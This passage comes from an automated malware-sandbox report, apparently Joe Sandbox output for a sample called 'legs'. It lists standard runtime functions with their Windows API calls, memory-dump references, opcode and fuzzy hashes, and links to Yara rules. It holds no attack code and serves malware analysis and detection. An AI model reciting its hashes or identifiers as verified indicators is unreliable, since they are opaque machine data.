                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                    • Opcode ID: c176e5517af56f6d520b0e9db641a2f87c411df06c114062f3a367f76599120e
                                                                                                                                                                                                                                                    • Instruction ID: 7f7039afefba07a4b56e537b3afb7bad13b3b619843e02215c0a133c5db9cca2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c176e5517af56f6d520b0e9db641a2f87c411df06c114062f3a367f76599120e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E210432A01211ABC7219F68FC40A5F73689B41764B204536ED47A7391FA38EE04C7DA
                                                                                                                                                                                                                                                    Function 0047625D Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 022b30da4520fbe7d7dc79bd6b739c01fa817cde29dbf931b8fad4469e8dce5d
                                                                                                                                                                                                                                                    • Instruction ID: 123c5c95fca0f0b9c6c955eb032c38ed758b21dddb77dcc9c5ddee479972dc54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 022b30da4520fbe7d7dc79bd6b739c01fa817cde29dbf931b8fad4469e8dce5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CB12670A04A45AFDB11DFA9D840BEE7BB2AF45304F19816EE90897382C7789D41CF5A
                                                                                                                                                                                                                                                    Function 0046D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0046D2B7,00465FB7,00465179), ref: 0046D2CE
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0046D2DC
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0046D2F5
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,0046D2B7,00465FB7,00465179), ref: 0046D347
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 585ed4e740a300a278e022d7dab1779a6e8e8ec454a5494d8ec9950c71b54830
                                                                                                                                                                                                                                                    • Instruction ID: 8acdbbf84186468df9fa12ce0a0ab132ad22390d11fb27984049b87356632a96
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 585ed4e740a300a278e022d7dab1779a6e8e8ec454a5494d8ec9950c71b54830
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C101F172F0A7119EE6252AB66CC58AB2684EB01778320067FF810903E0FB198C80938F
                                                                                                                                                                                                                                                    Function 0046DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0046DCA7
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0046DF20
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: f342fb49aadb39c49d18df1bd6d62aedf835166935166380bcc246ed7852e5e0
                                                                                                                                                                                                                                                    • Instruction ID: 47d21d96a0616e17abc6a167d81b0b2a7f266e9356828a593390be5f9c47c884
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f342fb49aadb39c49d18df1bd6d62aedf835166935166380bcc246ed7852e5e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB17971E00609AFCF28DFA5C9809AEB7B5FF14314F14405BE8116B306E779EA51CB9A
                                                                                                                                                                                                                                                    Function 00468C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,453CBA4A,?,?,00000000,0047B774,000000FF,?,00468D16,00468BFD,?,00468DB2,00000000), ref: 00468C8A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00468C9C
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0047B774,000000FF,?,00468D16,00468BFD,?,00468DB2,00000000), ref: 00468CBE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 278db3dbc37c1edf4391f6022de5a3f89612ab218e224de831f5760fe508818f
                                                                                                                                                                                                                                                    • Instruction ID: b8311f9cd2b5a5a7fcb118732ba0cdeae3c762ada5e98bb4ae3d484f46424219
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 278db3dbc37c1edf4391f6022de5a3f89612ab218e224de831f5760fe508818f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58016271955655EFDB119F54CD09BAEB7B8FB44B11F004A2AF811A22D0EBB89900CB98
                                                                                                                                                                                                                                                    Function 0046FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0046FCC2
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0046FD8B
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0046FDF2
                                                                                                                                                                                                                                                      • Part of subcall function 0046E531: RtlAllocateHeap.NTDLL(00000000,004631E1,0046186A,?,004660C1,0046186C,0046186A,?,?,?,00463181,004631E1,0046186E,0046186A,0046186A,0046186A), ref: 0046E563
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0046FE05
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0046FE12
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1423051803-0
                                                                                                                                                                                                                                                    • Opcode ID: 1909c3eb4a2957624e3513c90605251fddbff0604239c1ee914e6c83603c1595
                                                                                                                                                                                                                                                    • Instruction ID: 5d7d6f49016e3d4003f650dad559c1aa21ff239adb01adbb05ca7e82ed0c9ab1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1909c3eb4a2957624e3513c90605251fddbff0604239c1ee914e6c83603c1595
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51C7726001066BDF209F61EC41DBB7AA9EF54714B15003FFC45D6211FB3DDC6886AA
                                                                                                                                                                                                                                                    Function 00463010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00463017
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00463022
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00463090
                                                                                                                                                                                                                                                      • Part of subcall function 00462EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00462EFC
                                                                                                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 0046303D
                                                                                                                                                                                                                                                    • _Yarn.LIBCPMT ref: 00463053
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                                                                                                    • Opcode ID: 9eab0ba82ffab55193c74b5794e794da5252ca8bcaba749cd32dcb05a7aee44a
                                                                                                                                                                                                                                                    • Instruction ID: 248a39c2b2bfa8df10b192c971fc23556b3a291105d3ecd2934b1e8c04b53289
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9eab0ba82ffab55193c74b5794e794da5252ca8bcaba749cd32dcb05a7aee44a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501BCB5A00514ABCB05EF60E85167D7761FF84744B14882FE81257381EF78AE42CB8A
                                                                                                                                                                                                                                                    Function 00477E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00477F2E,00000000,?,00486E10,?,?,?,00477E65,00000004,InitializeCriticalSectionEx,0047E57C,0047E584), ref: 00477E9F
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00477F2E,00000000,?,00486E10,?,?,?,00477E65,00000004,InitializeCriticalSectionEx,0047E57C,0047E584,00000000,?,0046E1DC), ref: 00477EA9
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00477ED1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: 90341fa51ccff52b36b029aad51590a989a9f7517da11b37c56dee4954bc705f
                                                                                                                                                                                                                                                    • Instruction ID: 6ff9e17c76733f09ef961f06909350cdd9c265caeba51b04a83f3be3febeba1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90341fa51ccff52b36b029aad51590a989a9f7517da11b37c56dee4954bc705f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FE0D830284208BBDB101F60EC06BAE3B58DB00F51F10C431F90EB85E0D7659E5087CC
                                                                                                                                                                                                                                                    Function 0047562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(453CBA4A,00000000,00000000,?), ref: 00475690
                                                                                                                                                                                                                                                      • Part of subcall function 0046E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0046FDE8,?,00000000,-00000008), ref: 0046E6A2
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004758E2
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00475928
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004759CB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                                                                                                    • Opcode ID: e51b24bb1ec725a465a00809554a7a26b07415f343ee6be01ef5b7af77f56f5d
                                                                                                                                                                                                                                                    • Instruction ID: 28511afeab16aafce6396e9e93ed576dcbe3c95473091ba6bfbe7590466cad74
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51b24bb1ec725a465a00809554a7a26b07415f343ee6be01ef5b7af77f56f5d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAD18CB5D00648DFCB15CFA8C8809EEBBB5FF08314F28852EE55AEB351D674A942CB54
                                                                                                                                                                                                                                                    Function 0046D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: adc609f72a1d7a8e1219da9af0eb54a72f7c6846310ac710cd6881c6f0e11b58
                                                                                                                                                                                                                                                    • Instruction ID: f4d083c9dd240528c64a51c7c07419ddee086cf974edd786939f5356d53df063
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adc609f72a1d7a8e1219da9af0eb54a72f7c6846310ac710cd6881c6f0e11b58
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4751CDB2F08602AFDB299F51C841B6B73B4EF05314F14442FE84297291F739AD45CB9A
                                                                                                                                                                                                                                                    Function 00473537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0046FDE8,?,00000000,-00000008), ref: 0046E6A2
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0047359B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 004735A2
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 004735DC
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 004735E3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: 8a6597415b24424b6b2a25ea9534b98bd3e41b712c3f89dd3d556dc67d495992
                                                                                                                                                                                                                                                    • Instruction ID: d573723f43552a9e44f837321b2ceee46297b25c86bd6d2c7b9c803a20076d62
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a6597415b24424b6b2a25ea9534b98bd3e41b712c3f89dd3d556dc67d495992
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21CB71600605BFDB209F66C8418ABB79DEF0076A710C51FF81D97601E738EF509B96
                                                                                                                                                                                                                                                    Function 00468042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
